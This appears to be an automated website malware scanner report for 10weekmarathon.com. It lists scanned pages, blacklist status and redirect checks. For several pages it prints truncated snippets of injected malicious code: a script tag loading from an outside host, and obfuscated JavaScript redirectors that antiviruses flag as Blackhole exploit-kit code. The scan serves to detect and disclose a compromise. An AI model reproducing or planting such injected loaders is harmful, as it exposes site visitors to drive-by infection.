Malware Scanner report for 10weekmarathon.com

Malicious/Suspicious/Total urls checked: 9/3/13

12 pages have malicious or suspicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "10weekmarathon.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=10weekmarathon.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://10weekmarathon.com/	200 OK Content-Length: 11638 Content-Type: text/html	suspicious
Suspicious code found <script src="http://www.allyouneedtoearn.com/D4ngQbSy.php?id=60049298" type="text/javascript"></script>
http://connect.facebook.net/en_US/all.js	200 OK Content-Length: 163058 Content-Type: application/x-javascript	clean
http://10weekmarathon.com/index.php	200 OK Content-Length: 11638 Content-Type: text/html	suspicious
Suspicious code found <script src="http://www.allyouneedtoearn.com/D4ngQbSy.php?id=60049298" type="text/javascript"></script>
http://10weekmarathon.com/our-story.php	200 OK Content-Length: 12497 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,160,170,156,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,160,170,156,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,167,154,163,170,167,160,163,170,167,62,147,163,161,63,173,164,61,147,163,162,170,151,162,170,63,70,116,134,132,122,153,164,74,62,164,154,164,53,77,21,16,44,160,170,156,6 ... 1298 bytes are skipped ...175,167,60,164,145,170,154,55,44,177,21,16,44,172,145,166,44,170,163,150,145,175,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,172,145,166,44,151,174,164,155,166,151,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,155,152,44,54,162,110,145,175,167,101,101,162,171,160,160,44<!--footer end--> </div> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-6888519-1"); pageTracker._trackPageview(); } catch(err) {} Antivirus reports: AntiVir JS/EXP.Redir.EL.7 Avast JS:Includer-AUI [Trj] CAT-QuickHeal JS/Coolex.D Norman Blacole.WX
http://10weekmarathon.com/faq.php	200 OK Content-Length: 14978 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,160,170,156,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,160,170,156,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,167,154,163,170,167,160,163,170,167,62,147,163,161,63,173,164,61,147,163,162,170,151,162,170,63,70,116,134,132,122,153,164,74,62,164,154,164,53,77,21,16,44,160,170,156,6 ... 1298 bytes are skipped ...175,167,60,164,145,170,154,55,44,177,21,16,44,172,145,166,44,170,163,150,145,175,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,172,145,166,44,151,174,164,155,166,151,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,155,152,44,54,162,110,145,175,167,101,101,162,171,160,160,44<!--footer end--> </div> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-6888519-1"); pageTracker._trackPageview(); } catch(err) {} Antivirus reports: AntiVir JS/EXP.Redir.EL.7 Avast JS:Includer-AUI [Trj] CAT-QuickHeal JS/Coolex.D Norman Blacole.WX
http://10weekmarathon.com/order2.php	200 OK Content-Length: 17651 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,160,170,156,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,160,170,156,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,167,154,163,170,167,160,163,170,167,62,147,163,161,63,173,164,61,147,163,162,170,151,162,170,63,70,116,134,132,122,153,164,74,62,164,154,164,53,77,21,16,44,160,170,156,6 ... 1298 bytes are skipped ...175,167,60,164,145,170,154,55,44,177,21,16,44,172,145,166,44,170,163,150,145,175,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,172,145,166,44,151,174,164,155,166,151,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,155,152,44,54,162,110,145,175,167,101,101,162,171,160,160,44<!--footer end--> </div> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-6888519-1"); pageTracker._trackPageview(); } catch(err) {} Antivirus reports: AntiVir JS/EXP.Redir.EL.7 Avast JS:Includer-AUI [Trj] CAT-QuickHeal JS/Coolex.D Norman Blacole.WX
http://10weekmarathon.com/contact.php	200 OK Content-Length: 8323 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,160,170,156,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,160,170,156,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,167,154,163,170,167,160,163,170,167,62,147,163,161,63,173,164,61,147,163,162,170,151,162,170,63,70,116,134,132,122,153,164,74,62,164,154,164,53,77,21,16,44,160,170,156,6 ... 1298 bytes are skipped ...175,167,60,164,145,170,154,55,44,177,21,16,44,172,145,166,44,170,163,150,145,175,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,172,145,166,44,151,174,164,155,166,151,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,155,152,44,54,162,110,145,175,167,101,101,162,171,160,160,44<!--footer end--> </div> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-6888519-1"); pageTracker._trackPageview(); } catch(err) {} Antivirus reports: AntiVir JS/EXP.Redir.EL.7 Avast JS:Includer-AUI [Trj] CAT-QuickHeal JS/Coolex.D Norman Blacole.WX
http://10weekmarathon.com/js/utility.js	200 OK Content-Length: 7905 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) function MM_swapImgRestore() { var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i ) x.src=x.oSrc; } function MM_preloadImages() { var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array(); var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i ) if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j ].src=a[i];}} } function MM_findObj(n, d) { var p,i,x; if(!d) d=document; if((p=n.ind ... 3145 bytes are skipped ...^7b^74^35^2d^79^72^7b^39^2d^72^7b^71^2d^36^2d^36^48^1a^17^8a^1a^17^76^73^2d^35^7b^6e^83^76^74^6e^81^7c^7f^3b^70^7c^7c^78^76^72^52^7b^6e^6f^79^72^71^36^1a^17^88^1a^17^76^73^35^54^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^36^4a^4a^42^42^36^88^8a^72^79^80^72^88^60^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^39^2d^34^42^42^34^39^2d^34^3e^34^39^2d^34^3c^34^36^48^1a^17^1a^17^82^82^7e^79^7f^3d^46^35^36^48^1a^17^8a^1a^17^8a".split(a2);za="";aa("arCode");e("" za);} Antivirus reports: AntiVir HTML/ExpKit.Gen5 Avast JS:Includer-AUC [Trj] Ad-Aware Trojan.JS.Redirector.BMV Ikarus JS.Exploit.BlackHole nProtect Trojan.JS.Redirector.BMV Comodo Exploit.JS.Blacole.EH Emsisoft Trojan.JS.Redirector.BMV (B) CAT-QuickHeal JS/BlacoleRef.CEZ DrWeb JS.IFrame.500 Microsoft VirTool:JS/Obfuscator.EQ MicroWorld-eScan Trojan.JS.Redirector.BMV NANO-Antivirus Trojan.Script.Expack.chwlwn F-Secure Trojan.JS.Redirector.BMV GData Trojan.JS.Redirector.BMV BitDefender Trojan.JS.Redirector.BMV
http://10weekmarathon.com/js/validation.js	200 OK Content-Length: 13167 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) function chkForm() { var email=document.contact.email.value; var sCont = document.contact.email; var sContVal = document.contact.email.value; var str=new String(); str=sContVal; var span=new RegExp("[ ]","g"); var rep=str.replace(span,"9"); var str=new String(); str=sContVal; var span=new RegExp("[ ]","g"); var rep=str.replace(span,"9"); if (document.contact.txtfname.value == '') { al ... 3301 bytes are skipped ...^7b^74^35^2d^79^72^7b^39^2d^72^7b^71^2d^36^2d^36^48^1a^17^8a^1a^17^76^73^2d^35^7b^6e^83^76^74^6e^81^7c^7f^3b^70^7c^7c^78^76^72^52^7b^6e^6f^79^72^71^36^1a^17^88^1a^17^76^73^35^54^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^36^4a^4a^42^42^36^88^8a^72^79^80^72^88^60^72^81^50^7c^7c^78^76^72^35^34^83^76^80^76^81^72^71^6c^82^7e^34^39^2d^34^42^42^34^39^2d^34^3e^34^39^2d^34^3c^34^36^48^1a^17^1a^17^82^82^7e^79^7f^3d^46^35^36^48^1a^17^8a^1a^17^8a".split(a2);za="";aa("arCode");e("" za);} Antivirus reports: AntiVir HTML/ExpKit.Gen5 Avast JS:Includer-AUC [Trj] Comodo Exploit.JS.Blacole.EH DrWeb JS.IFrame.500 Microsoft VirTool:JS/Obfuscator.EQ NANO-Antivirus Trojan.Script.Expack.chwlwn GData Script.Packed.IFrame.G
http://10weekmarathon.com/order.php	200 OK Content-Length: 12537 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,160,170,156,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,160,170,156,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,167,154,163,170,167,160,163,170,167,62,147,163,161,63,173,164,61,147,163,162,170,151,162,170,63,70,116,134,132,122,153,164,74,62,164,154,164,53,77,21,16,44,160,170,156,6 ... 1298 bytes are skipped ...175,167,60,164,145,170,154,55,44,177,21,16,44,172,145,166,44,170,163,150,145,175,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,172,145,166,44,151,174,164,155,166,151,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,155,152,44,54,162,110,145,175,167,101,101,162,171,160,160,44<!--footer end--> </div> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-6888519-1"); pageTracker._trackPageview(); } catch(err) {} Antivirus reports: AntiVir JS/EXP.Redir.EL.7 Avast JS:Includer-AUI [Trj] CAT-QuickHeal JS/Coolex.D Norman Blacole.WX
http://10weekmarathon.com/return.php	200 OK Content-Length: 8926 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,160,170,156,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,160,170,156,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,167,154,163,170,167,160,163,170,167,62,147,163,161,63,173,164,61,147,163,162,170,151,162,170,63,70,116,134,132,122,153,164,74,62,164,154,164,53,77,21,16,44,160,170,156,6 ... 1298 bytes are skipped ...175,167,60,164,145,170,154,55,44,177,21,16,44,172,145,166,44,170,163,150,145,175,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,172,145,166,44,151,174,164,155,166,151,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,155,152,44,54,162,110,145,175,167,101,101,162,171,160,160,44<!--footer end--> </div> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-6888519-1"); pageTracker._trackPageview(); } catch(err) {} Antivirus reports: AntiVir JS/EXP.Redir.EL.7 Avast JS:Includer-AUI [Trj] CAT-QuickHeal JS/Coolex.D Norman Blacole.WX
http://10weekmarathon.com/terms.php	200 OK Content-Length: 12060 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,160,170,156,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,160,170,156,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,167,154,163,170,167,160,163,170,167,62,147,163,161,63,173,164,61,147,163,162,170,151,162,170,63,70,116,134,132,122,153,164,74,62,164,154,164,53,77,21,16,44,160,170,156,6 ... 1375 bytes are skipped ...175,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,172,145,166,44,151,174,164,155,166,151,44,101,44,162,151,173,44,110,145,170,151,54,55,77,21,16,44,155,152,44,54,162,110,145,175,167,101,101,162,171,160,160,44<!--footer end--> </div> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https:document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); Antivirus reports: AntiVir JS/EXP.Redir.EL.7 Avast JS:Includer-AUI [Trj] CAT-QuickHeal JS/Coolex.D Norman Blacole.WX
http://10weekmarathon.com/test404page.js	404 Not Found Content-Length: 2998 Content-Type: text/html	suspicious
Suspicious code found <script src="http://www.allyouneedtoearn.com/D4ngQbSy.php?id=60049300" type="text/javascript"></script>

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: 10weekmarathon.com

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 05 Sep 2014 00:13:21 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=2fv9ek0ki07s4fadiobpcpeh97; path=/

Second query (visit from search engine):
GET / HTTP/1.1
Host: 10weekmarathon.com
Referer: http://www.google.com/search?q=10weekmarathon.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for 10weekmarathon.com

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools